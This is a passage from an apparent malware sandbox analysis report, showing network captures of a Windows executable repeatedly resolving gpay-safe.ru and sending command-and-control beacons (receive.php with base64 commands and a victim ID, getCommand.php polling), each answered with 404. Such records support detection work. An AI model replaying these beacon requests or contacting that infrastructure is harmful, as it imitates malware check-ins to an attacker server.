                                          Aug 25, 2021 00:49:16.258338928 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:16.348107100 CEST | 80 | 49725 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:16.366950989 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:16.456933975 CEST | 80 | 49725 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:16.508991003 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:17.575655937 CEST | 49725 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:25.158457041 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:25.260006905 CEST | 80 | 49726 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:25.260255098 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:25.262612104 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:25.364553928 CEST | 80 | 49726 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:25.366013050 CEST | 80 | 49726 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:25.372049093 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:25.474937916 CEST | 80 | 49726 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:25.522367954 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:27.169502974 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:27.271891117 CEST | 80 | 49726 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:27.319479942 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:28.168478966 CEST | 49726 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:29.545062065 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:29.644984007 CEST | 80 | 49727 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:29.645200968 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:29.646075964 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:29.746197939 CEST | 80 | 49727 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:29.747039080 CEST | 80 | 49727 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:29.754647970 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:29.854893923 CEST | 80 | 49727 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:29.913408995 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:30.652084112 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:30.754179001 CEST | 80 | 49727 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:30.766211987 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:30.866970062 CEST | 80 | 49727 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:30.913463116 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:31.476210117 CEST | 49727 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:34.042249918 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:34.143327951 CEST | 80 | 49730 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:34.146258116 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:34.147334099 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:34.248514891 CEST | 80 | 49730 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:34.248711109 CEST | 80 | 49730 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:34.260885000 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:34.364558935 CEST | 80 | 49730 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:34.523206949 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:35.357151985 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:35.458375931 CEST | 80 | 49730 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:35.487190008 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:35.589535952 CEST | 80 | 49730 | 91.206.93.216 | 192.168.2.4
                                          Aug 25, 2021 00:49:35.677423954 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216
                                          Aug 25, 2021 00:49:37.912559032 CEST | 49730 | 80 | 192.168.2.4 | 91.206.93.216

                                          UDP Packets

                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                          Aug 25, 2021 00:48:58.531050920 CEST | 59123 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:48:58.565023899 CEST | 53 | 59123 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:10.261408091 CEST | 54531 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:10.351469040 CEST | 53 | 54531 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:15.161828995 CEST | 49714 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:15.195938110 CEST | 53 | 49714 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:25.048155069 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:25.141108036 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:29.496506929 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:29.531724930 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:30.426490068 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:30.466761112 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:33.990952015 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:34.023390055 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:55.349636078 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:55.425941944 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:55.892905951 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:55.927673101 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:56.658900023 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:56.669356108 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:56.699084997 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:56.709753036 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:57.082869053 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:57.118884087 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:57.583236933 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:57.621784925 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:58.163708925 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:58.196003914 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:49:59.161530972 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:49:59.199778080 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:50:00.413264990 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:50:00.445626974 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:50:01.038789988 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:50:01.074285030 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:50:01.422975063 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:50:01.458163977 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:50:08.926778078 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:50:08.968209982 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:50:41.902863026 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:50:41.927185059 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                          Aug 25, 2021 00:50:43.564588070 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                          Aug 25, 2021 00:50:43.618093014 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4

                                          ICMP Packets

                                          Timestamp | Source IP | Dest IP | Checksum | Code | Type
                                          Aug 25, 2021 00:49:12.133935928 CEST | 192.168.2.4 | 1.1.1.1 | 4d5a | | Echo
                                          Aug 25, 2021 00:49:12.151592016 CEST | 1.1.1.1 | 192.168.2.4 | 555a | | Echo Reply
                                          Aug 25, 2021 00:49:17.348012924 CEST | 192.168.2.4 | 1.1.1.1 | 4d59 | | Echo
                                          Aug 25, 2021 00:49:17.364979982 CEST | 1.1.1.1 | 192.168.2.4 | 5559 | | Echo Reply
                                          Aug 25, 2021 00:49:27.016191959 CEST | 192.168.2.4 | 1.1.1.1 | 4d58 | | Echo
                                          Aug 25, 2021 00:49:27.032962084 CEST | 1.1.1.1 | 192.168.2.4 | 5558 | | Echo Reply
                                          Aug 25, 2021 00:49:31.675748110 CEST | 192.168.2.4 | 1.1.1.1 | 4d57 | | Echo
                                          Aug 25, 2021 00:49:31.693113089 CEST | 1.1.1.1 | 192.168.2.4 | 5557 | | Echo Reply
                                          Aug 25, 2021 00:49:37.693022013 CEST | 192.168.2.4 | 1.1.1.1 | 4d56 | | Echo
                                          Aug 25, 2021 00:49:37.713967085 CEST | 1.1.1.1 | 192.168.2.4 | 5556 | | Echo Reply

                                          DNS Queries

                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                          Aug 25, 2021 00:49:10.261408091 CEST | 192.168.2.4 | 8.8.8.8 | 0xf789 | Standard query (0) | gpay-safe.ru | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:15.161828995 CEST | 192.168.2.4 | 8.8.8.8 | 0x9d4 | Standard query (0) | gpay-safe.ru | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:25.048155069 CEST | 192.168.2.4 | 8.8.8.8 | 0x4bca | Standard query (0) | gpay-safe.ru | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:29.496506929 CEST | 192.168.2.4 | 8.8.8.8 | 0xa28c | Standard query (0) | gpay-safe.ru | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:33.990952015 CEST | 192.168.2.4 | 8.8.8.8 | 0x1cbd | Standard query (0) | gpay-safe.ru | A (IP address) | IN (0x0001)

                                          DNS Answers

                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                          Aug 25, 2021 00:49:10.351469040 CEST | 8.8.8.8 | 192.168.2.4 | 0xf789 | No error (0) | gpay-safe.ru | | 91.206.93.216 | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:15.195938110 CEST | 8.8.8.8 | 192.168.2.4 | 0x9d4 | No error (0) | gpay-safe.ru | | 91.206.93.216 | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:25.141108036 CEST | 8.8.8.8 | 192.168.2.4 | 0x4bca | No error (0) | gpay-safe.ru | | 91.206.93.216 | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:29.531724930 CEST | 8.8.8.8 | 192.168.2.4 | 0xa28c | No error (0) | gpay-safe.ru | | 91.206.93.216 | A (IP address) | IN (0x0001)
                                          Aug 25, 2021 00:49:34.023390055 CEST | 8.8.8.8 | 192.168.2.4 | 0x1cbd | No error (0) | gpay-safe.ru | | 91.206.93.216 | A (IP address) | IN (0x0001)

                                          HTTP Request Dependency Graph

                                          • gpay-safe.ru

                                          HTTP Packets

                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          0 | 192.168.2.4 | 49724 | 91.206.93.216 | 80 | C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Aug 25, 2021 00:49:10.466486931 CEST | 1131 | OUT | GET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:10.563898087 CEST | 1131 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:10 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:10.577456951 CEST | 1132 | OUT | GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:10.675556898 CEST | 1132 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:10 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:12.321815968 CEST | 1132 | OUT | GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:12.420679092 CEST | 1133 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:12 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          1 | 192.168.2.4 | 49725 | 91.206.93.216 | 80 | C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Aug 25, 2021 00:49:15.306813002 CEST | 1227 | OUT | GET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:15.397839069 CEST | 1227 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:15 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:15.404287100 CEST | 1228 | OUT | GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:15.495248079 CEST | 1228 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:15 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:16.258338928 CEST | 1228 | OUT | GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:16.348107100 CEST | 1229 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:16 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:16.366950989 CEST | 1229 | OUT | GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:16.456933975 CEST | 1230 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:16 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          2 | 192.168.2.4 | 49726 | 91.206.93.216 | 80 | C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Aug 25, 2021 00:49:25.262612104 CEST | 1317 | OUT | GET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:25.366013050 CEST | 1317 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:25 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:25.372049093 CEST | 1317 | OUT | GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:25.474937916 CEST | 1318 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:25 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:27.169502974 CEST | 1318 | OUT | GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:27.271891117 CEST | 1319 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:27 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          3 | 192.168.2.4 | 49727 | 91.206.93.216 | 80 | C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Aug 25, 2021 00:49:29.646075964 CEST | 1319 | OUT | GET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:29.747039080 CEST | 1320 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:29 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:29.754647970 CEST | 1320 | OUT | GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:29.854893923 CEST | 1321 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:29 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:30.652084112 CEST | 1332 | OUT | GET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:30.754179001 CEST | 1332 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:30 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:30.766211987 CEST | 1332 | OUT | GET /x//getCommand.php?id=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:30.866970062 CEST | 1333 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:30 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>


                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                          4 | 192.168.2.4 | 49730 | 91.206.93.216 | 80 | C:\Users\user\Desktop\4054EE21CBFC210489F119C2D717CA1AE43129FC0D07A.exe
                                          Timestamp | kBytes transferred | Direction | Data
                                          Aug 25, 2021 00:49:34.147334099 CEST | 1344 | OUT | GET /x/ HTTP/1.1
                                          Host: gpay-safe.ru
                                          Connection: Keep-Alive
                                          Aug 25, 2021 00:49:34.248711109 CEST | 1345 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:34 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:34.260885000 CEST | 1345 | OUT | GET /x//receive.php?command=VW5pbnN0YWxs&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:34.364558935 CEST | 1346 | IN | HTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:34 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at gpay-safe.ru Port 80</address></body></html>
                                          Aug 25, 2021 00:49:35.357151985 CEST1346OUTGET /x//receive.php?command=T25saW5l&vicID=SGFDa182NUYxRDNBOQ HTTP/1.1
                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
                                          Host: gpay-safe.ru
                                          Aug 25, 2021 00:49:35.458375931 CEST1347INHTTP/1.1 404 Not Found
                                          Date: Tue, 24 Aug 2021 22:49:35 GMT
                                          Server: Apache/2.4.29 (Ubuntu)
                                          Content-Length: 274
                                          Content-Type: text/html; charset=iso-8859-1
